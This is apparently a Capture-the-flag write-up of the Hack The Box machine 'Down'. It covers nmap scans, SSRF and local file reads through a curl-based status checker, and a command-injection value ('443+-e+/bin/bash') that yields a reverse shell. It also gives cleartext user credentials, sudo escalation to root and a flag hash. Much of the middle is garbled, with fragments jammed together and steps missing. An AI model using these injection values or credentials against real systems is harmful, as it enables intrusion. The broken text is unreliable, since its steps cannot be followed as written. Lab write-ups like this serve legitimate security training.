Platform: Hack The Box
IP Address: 10.129.234.87
Difficulty: Easy
Status: ✅ Completed
Down is a beginner-friendly box involving a vulnerable website status checker. By exploiting an insecure curl usage and bypassing input validation, we achieve a reverse shell. Lateral movement to a user-owned encrypted password manager leads to privilege escalation and root access.
nmap -p- 10.129.234.87 --min-rate 10000
nmap -p 22,80 10.129.234.87 -sCV -oN nmapscan
Open Ports:
curl, allowing SSRF and LFI (file:///etc/passwd).IP and port.443+-e+/bin/bash allows command injection.www-data./home/aleks/.local/share/pswm/pswmflower, Final creds: aleks:1uY3w22uc-Wr{xNHR~+Ealeks has full sudo rights (sudo -l shows ALL).sudo su -.d4bc94b386ef7c8113698a8c4951cacd87bb9869a311b8abb5fb4d3c7248fdcb